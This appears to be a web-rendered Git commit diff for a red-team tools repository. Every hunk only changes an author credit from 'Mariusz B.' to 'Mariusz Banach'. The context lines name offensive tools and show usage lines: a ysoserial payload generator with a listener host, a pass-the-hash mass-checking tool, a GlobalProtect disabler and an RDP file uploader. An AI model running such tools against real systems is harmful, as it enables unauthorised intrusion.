|
* Authors:
|
||||||
* Mariusz B. / mgeeky
|
* Mariusz Banach / mgeeky
|
||||||
* Jakub M. / unkn0w
|
* Jakub M. / unkn0w
|
||||||
*
|
*
|
||||||
* Version:
|
* Version:
|
||||||
|
@ -80,7 +80,7 @@ hostname|23:55|~/dev/py-collaborator # python3.7 py-collaborator-server.py -d
|
|||||||
|
|
||||||
:: Cracking the Lens pingback responding server
|
:: Cracking the Lens pingback responding server
|
||||||
Responds to every Out-of-band request correlating them along the way
|
Responds to every Out-of-band request correlating them along the way
|
||||||
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[-] You shall specify all needed MySQL connection data either via program options or config file.
|
[-] You shall specify all needed MySQL connection data either via program options or config file.
|
||||||
[+] Database initialized.
|
[+] Database initialized.
|
||||||
|
@ -211,7 +211,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Cracking the Lens pingback responding server
|
:: Cracking the Lens pingback responding server
|
||||||
Responds to every Out-of-band request correlating them along the way
|
Responds to every Out-of-band request correlating them along the way
|
||||||
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
|
||||||
|
@ -18,7 +18,7 @@
|
|||||||
# - jwt
|
# - jwt
|
||||||
# - anytree
|
# - anytree
|
||||||
#
|
#
|
||||||
# Mariusz B., 2018
|
# Mariusz Banach, 2018
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
@ -26,7 +26,7 @@
|
|||||||
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
|
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
|
||||||
# :: ysoserial payloads generation helper
|
# :: ysoserial payloads generation helper
|
||||||
# Helps generate many variations of payloads to try against vulnerable application.
|
# Helps generate many variations of payloads to try against vulnerable application.
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
# v0.1
|
# v0.1
|
||||||
#
|
#
|
||||||
# [+] Command within payload:
|
# [+] Command within payload:
|
||||||
@ -55,7 +55,7 @@
|
|||||||
#
|
#
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B., '18-19 / <mb@binary-offensive.com>
|
# Mariusz Banach, '18-19 / <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@ -379,7 +379,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: ysoserial payloads generation helper
|
:: ysoserial payloads generation helper
|
||||||
Helps generate many variations of payloads to try against vulnerable application.
|
Helps generate many variations of payloads to try against vulnerable application.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -12,7 +12,7 @@
|
|||||||
* Compilation:
|
* Compilation:
|
||||||
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
|
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
|
||||||
*
|
*
|
||||||
* Mariusz B. / mgeeky, '18-'20
|
* Mariusz Banach / mgeeky, '18-'20
|
||||||
**/
|
**/
|
||||||
|
|
||||||
#include "windows.h"
|
#include "windows.h"
|
||||||
|
@ -13,7 +13,7 @@
|
|||||||
```
|
```
|
||||||
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
|
|
||||||
usage: .\findSymbols.py [options] <path>
|
usage: .\findSymbols.py [options] <path>
|
||||||
@ -117,7 +117,7 @@ PS> python3 rdpFileUpload.py -v -f certutil README.md
|
|||||||
Takes an input file/folder and retypes it into focused RDP session window.
|
Takes an input file/folder and retypes it into focused RDP session window.
|
||||||
That effectively uploads the file into remote host over a RDP channel.
|
That effectively uploads the file into remote host over a RDP channel.
|
||||||
|
|
||||||
Mariusz B. / mgeeky '20, (@mariuszbit)
|
Mariusz Banach / mgeeky '20, (@mariuszbit)
|
||||||
<mb@binary-offensive.com>
|
<mb@binary-offensive.com>
|
||||||
|
|
||||||
[+] Will upload file's contents: "README.md"
|
[+] Will upload file's contents: "README.md"
|
||||||
|
@ -9,7 +9,7 @@
|
|||||||
# - module matching name
|
# - module matching name
|
||||||
# - module NOT matching name
|
# - module NOT matching name
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '21
|
# Mariusz Banach / mgeeky, '21
|
||||||
# <mb [at] binary-offensive.com>
|
# <mb [at] binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
@ -436,7 +436,7 @@ def main():
|
|||||||
out('''
|
out('''
|
||||||
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
|
@ -23,7 +23,7 @@
|
|||||||
# $ ./pth-carpet.py machines.txt pwdump
|
# $ ./pth-carpet.py machines.txt pwdump
|
||||||
#
|
#
|
||||||
# coded by:
|
# coded by:
|
||||||
# Mariusz B., 2016 / mgeeky
|
# Mariusz Banach, 2016 / mgeeky
|
||||||
# version 0.2
|
# version 0.2
|
||||||
#
|
#
|
||||||
# Should be working on Windows boxes as well as on Linux ones.
|
# Should be working on Windows boxes as well as on Linux ones.
|
||||||
@ -172,7 +172,7 @@ def worker(stopevent, pwdump, machine):
|
|||||||
def main():
|
def main():
|
||||||
global OPTIONS
|
global OPTIONS
|
||||||
|
|
||||||
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz B., 2016\n', 'white', attrs=['bold']))
|
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
|
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
|
||||||
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
|
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
|
||||||
|
@ -21,7 +21,7 @@
|
|||||||
# - tqdm
|
# - tqdm
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B. / mgeeky (@mariuszbit), '20
|
# Mariusz Banach / mgeeky (@mariuszbit), '20
|
||||||
# <mb [at] binary-offensive.com>
|
# <mb [at] binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
@ -313,7 +313,7 @@ def parseOptions(argv):
|
|||||||
Takes an input file/folder and retypes it into focused RDP session window.
|
Takes an input file/folder and retypes it into focused RDP session window.
|
||||||
That effectively uploads the file into remote host over a RDP channel.
|
That effectively uploads the file into remote host over a RDP channel.
|
||||||
|
|
||||||
Mariusz B. / mgeeky '20, (@mariuszbit)
|
Mariusz Banach / mgeeky '20, (@mariuszbit)
|
||||||
<mb@binary-offensive.com>
|
<mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user